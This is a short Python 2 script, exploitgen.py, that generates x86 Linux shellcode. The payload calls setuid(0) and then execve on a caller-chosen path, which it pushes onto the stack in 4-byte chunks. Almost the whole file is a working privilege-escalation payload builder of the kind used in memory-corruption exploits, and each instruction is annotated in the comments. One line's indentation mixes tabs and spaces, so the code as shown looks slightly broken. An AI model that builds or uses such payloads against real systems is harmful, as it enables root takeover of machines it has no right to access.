exploitgen.py

__author__ = "Felix Hellman, Hannes Knutsson"
__credits__ = ["Felix Hellman", "Hannes Knutsson"]

#Premable Definition
payload_preamble = 	"\x6a\x46" 	#push   $0x46		Setup for suid, 0x46 setuid syscall
payload_preamble+=  	"\x58"     	#pop    %eax		Pop 0x46 to eax
payload_preamble+=	"\x31\xdb"	#xor    %ebx,%ebx	Clear ebx to 0, (for root)
payload_preamble+=	"\xcd\x80"	#int    $0x80		Syscall

payload_preamble+=	"\x31\xd2"	#xor    %edx,%edx	Set edx to 0
payload_preamble+=	"\x6a\x0b"	#push   $0xb		push 0xb, execve syscall
payload_preamble+=	"\x58"   	#pop    %eax		Pop 0xb to eax
payload_preamble+=	"\x52"   	#push   %edx		Push null termination for string


#Epilogue Definition
payload_epilogue = 	"\x89\xe3"	#mov    %esp,%ebx	Move stack pointer to ebx as first argument (filename)
payload_epilogue+= 	"\x52"    	#push   %edx		Put null pointer
payload_epilogue+= 	"\x53"    	#push   %ebx		Push pointer of old stack pointer (filename)
payload_epilogue+= 	"\x89\xe1"	#mov    %esp,%ecx	Setup doublepointer for *argv[]   &(filename)
payload_epilogue+= 	"\xcd\x80"	#int    $0x80		Syscall


def reverseString(input):
    output = "";
    for i in xrange(len(input)-1,-1,-1):
        output+=input[i]
    return output



def generatePayload(str_input):
    counter = 0
    input = str_input
    remainder = len(input) % 4

    #Make sure input is even with 4 bytes
    if remainder != 0:
        padding = "/"*(4 - remainder)
        input = padding + input

    #Reverse string
    output = reverseString(input)

    hexString = ""; 
    index = 0
    codeList = []

    payload_mid = "";

    for c in output:
        codeList.append(str(hex(ord(c))).replace("0x",""))
        index += 1
        if index % 4 == 0:
            reversedBytes = []
            for i in xrange(len(codeList)-1,-1,-1):
                reversedBytes += codeList[i];
            payload_mid += "68"
	    counter += 1
            for i in xrange(0,len(reversedBytes)-1,2):
                payload_mid += ""+reversedBytes[i] + reversedBytes[i+1]
            del codeList[:]

    payload_mid = payload_mid.decode("hex")

    return payload_preamble + payload_mid + payload_epilogue